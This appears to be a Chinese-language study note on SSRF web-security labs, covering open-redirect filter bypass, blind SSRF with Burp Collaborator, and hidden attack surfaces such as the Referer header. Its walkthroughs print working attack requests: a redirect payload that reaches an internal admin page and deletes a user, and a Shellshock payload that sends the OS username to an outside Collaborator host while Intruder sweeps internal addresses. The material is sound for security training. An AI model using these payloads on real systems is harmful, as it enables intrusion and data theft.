3、通过开放重定向绕过SSRF滤波器

1、有时可以通过利用开放的重定向漏洞来绕过任何类型的基于过滤器的防御。

2、假设用户提交的URL经过严格验证，以防止对SSRF行为的恶意利用。但允许其URL的应用程序包含一个开放的重定向漏洞。如果用于使后端HTTP请求支持重定向的API，则可以构造一个满足过滤器的URL，并将请求重定向到所需的后端目标

例如，假设应用程序包含一个开放的重定向漏洞，其中以下URL：
/product/nextProduct?currentProductId=6&path=http://evil-user.net
返回重定向到：
http://evil-user.net

3、可以利用开放重定向漏洞绕过URL过滤器，并利用SSRF漏洞进行攻击

例如：
POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin

这个SSRF攻击之所以有效，是因为应用程序首先验证提供的stockAPI URL是否在允许的域中，它确实是。然后应用程序请求提供的URL，这将触发打开重定向。它遵循重定向，并向攻击者选择的内部URL发出请求

4、涉及实验：

实验4：SSRF通过开放重定向漏洞绕过过滤器

实验4：SSRF通过开放重定向漏洞绕过过滤器

信息：

这个实验室有一个库存检查功能，可以从内部系统获取数据

要解决这个实验室：改变库存检查的 URL，以访问 http://192.168.0.12:8080/admin 的管理界面，并删除用户 carlos

库存检查器被限制为只能访问本地应用程序，因此需要首先找到一个影响应用程序的打开重定向

part1:

访问一个产品，点击"检查库存"，使用BP拦截请求，并将其发送到repeater

尝试篡改stockApi参数，观察到无法使服务器直接向其他主机发出请求

part2:

重定向功能

单击"next product"并观察到path参数被放置到重定向响应的Location头中，从而导致打开重定向

发送到repeater

创建一个利用开放重定向漏洞的URL，重定向到管理界面，并将其输入股票检查器上的stockApi参数：

/product/nextProduct?path=http://192.168.0.12:8080/admin

跟随重定向并显示管理页面

（但是重定向没有真真的被执行）

part3：

添加重定向参数，并使用其他方式提交（因为GET提交的重定向会检查参数）

(这一过程中测试了很多情况)

如（失败的）：

part4：

管理页面

如果失败（注意是cookie的问题，重新拦截发包）

请求头：
POST /product/stock HTTP/1.1
请求数据：
stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin

part5：

完成实验

修改路径以删除目标用户

/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

四、盲SSRF漏洞

1、简述：

1、当应用程序被诱导向提供的URL发出后端HTTP请求，但来自后端请求的响应没有在应用程序的前端响应中返回时，就会出现盲SSRF漏洞。

2、盲SSRF通常更难被利用，但有时会导致在服务器或其他后端组件上完全远程执行代码。

2、影响：

盲目SSRF漏洞的影响通常低于完全知情的SSRF漏洞，因为它们是单向的。虽然在某些情况下可以利用它们来实现完全的远程代码执行，但不能轻易利用它们来从后端系统检索敏感数据。

3、发现和利用SSRF漏洞

1、检测盲SSRF漏洞的最可靠方法是使用带外（OAST）技术。这涉及到尝试触发对您控制的外部系统的HTTP请求，并监视与该系统的网络交互。

2、使用带外技术最简单、最有效的方法是使用Burp Collaborator。您可以使用Burp Collaborator客户机生成唯一的域名，将这些域名以有效负载的形式发送到应用程序，并监视与这些域的任何交互。如果观察到来自应用程序的传入HTTP请求，则它容易受到SSRF攻击。

3、 在测试SSRF漏洞时，通常会观察到针对所提供Collaborator域的DNS查找，但没有后续HTTP请求。发生这种情况的原因通常是应用程序试图向域发出HTTP请求，这会导致初始DNS查找，但实际的HTTP请求被网络级过滤阻止。基础设施允许出站DNS流量是相对常见的，因为这是许多目的所需要的，但会阻止到意外目的地的HTTP连接。

4、简单地识别盲人SSRF易损性可以触发带外HTTP请求的漏洞本身并不提供攻击途径。由于无法查看后端请求的响应，因此不能使用该行为来浏览应用服务器可以访问的系统上的内容。但是，仍然可以利用它来探测服务器本身或其他后端系统上的其他漏洞。您可以盲目地扫描内部IP地址空间，发送旨在检测已知漏洞的有效负载。如果这些有效负载还采用了盲带外技术，那么您可能会发现未打补丁的内部服务器上存在严重漏洞。

5、利用SSRF漏洞的另一个途径是诱使应用程序连接到攻击者控制下的系统，并向建立连接的HTTP客户端返回恶意响应。如果可以利用服务器HTTP实现中的严重客户端漏洞，则可能能够在应用程序基础结构中实现远程代码执行。

6、涉及实验：

实验5：带外检测的盲SSRF

实验7：利用Shellshock的盲SSRF

实验5：带外检测的盲SSRF

本网站使用分析软件，当产品页面加载时，该软件会获取Referer标题中指定的URL。

要解决实验：使用此功能向公共Burp Collaborator服务器发出HTTP请求。

part1:

访问一个产品，在Burp Suite中拦截请求，并将其发送到Burp Repeater

part2:

使用BP提供的服务器客户端

BP选项卡---BC客户端---复制服务器URL

https://xqrbsy7k0bvri28avnpps3ddb4hu5j.burpcollaborator.net

以使用Burp Collaborator生成的域替换原始域（Referer），发送请求

转到Collaborator选项卡，再刷新，查看交互信息（看到一些DNS和HTTP交互，这些交互是应用程序由于负载而启动的）

实验7：利用Shellshock的盲SSRF

本网站使用分析软件，当产品页面加载时，该软件会获取Referer标题中指定的URL。

要解决实验问题，请使用此功能对端口8080上的192.168.0.X范围内的内部服务器执行SSRF盲攻击。在盲目攻击中，对内部服务器使用Shellshock有效负载以泄漏操作系统用户的名称

part1:

在Burp Suite Professional中，从BApp Store安装"Collaborator Everywhere"扩展

part2：

插件的检测

将实验室域添加到Burp Suite的目标范围，以便Collaborator Everywhere将其作为目标。

浏览网站，当加载产品页面时，它通过Referer头触发了与Burp Collaborator的HTTP交互

观察HTTP交互在HTTP请求中包含User-Agent字符串。将对产品页面的请求发送给Burp Intruder

part3：

ssrf盲测

使用Burp Collaborator 客户端生成唯一的 Burp Collaborator 有效载荷，并将其放入以下 Shellshock 有效载荷中

() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN
我的是：
() { :; }; /usr/bin/nslookup $(whoami).87datwvawy02yijyhbt67qkzfqlh96.burpcollaborator.net

单击“clear §”，更改 Referer 标头，http://192.168.0.1:8080然后突出显示 IP 地址的最后一个八位字节（数字1），单击“添加 §”

切换到Payloads选项卡，将有效负载类型更改为Numbers，并在"From"、"To"和"Step"框中分别输入1、255和1（单击"开始攻击"）

攻击完成后，返回Collaborator选项卡，然后单击"立即轮询"。应该看到一个DNS交互，它是由被成功的盲SSRF攻击击中的后端系统发起的。操作系统用户的名称应显示在DNS子域中。

（如果始终没有结果，考虑是否是cookie过期，换一个cookie；或者重新复制一个BP客户端URL）

part5：

完成实验

输入操作系统用户的名称

五、寻找SSRF漏洞的隐藏攻击面

1、简述：

许多服务器端请求伪造漏洞相对容易发现，因为应用程序的正常通信涉及包含完整URL的请求参数。SSRF的其他例子更难找到。

2、请求中的部分URL

有时，应用程序只将主机名或URL路径的一部分放入请求参数中。然后，提交的值在服务器端合并到请求的完整URL中。如果该值很容易被识别为主机名或URL路径，则潜在的攻击面可能很明显。然而，作为完整SSRF的可利用性可能会受到限制，因为您无法控制所请求的整个URL。

3、数据格式中的URL

一些应用程序传输数据的格式的规范允许包含数据解析器可能会请求的格式的URL。一个明显的例子是XML数据格式，它已广泛用于Web应用程序中将结构化数据从客户机传输到服务器。当应用程序接受XML格式的数据并对其进行解析时，它可能容易受到XXE注射液，并反过来容易受到SSRF通过XXE。我们将在查看时更详细地讨论这一点XXE注射液脆弱性。

4、SSRF通过Referer报头

一些应用程序使用服务器端分析软件来跟踪访问者。该软件通常记录请求中的Referer头，因为这对于跟踪传入链接特别有用。分析软件通常会访问出现在Referer标题中的任何第三方URL。这通常用于分析引用站点的内容，包括传入链接中使用的锚文本。因此，Referer报头通常代表SSRF漏洞的有效攻击面。见盲SSRF漏洞有关Referer标头漏洞的示例。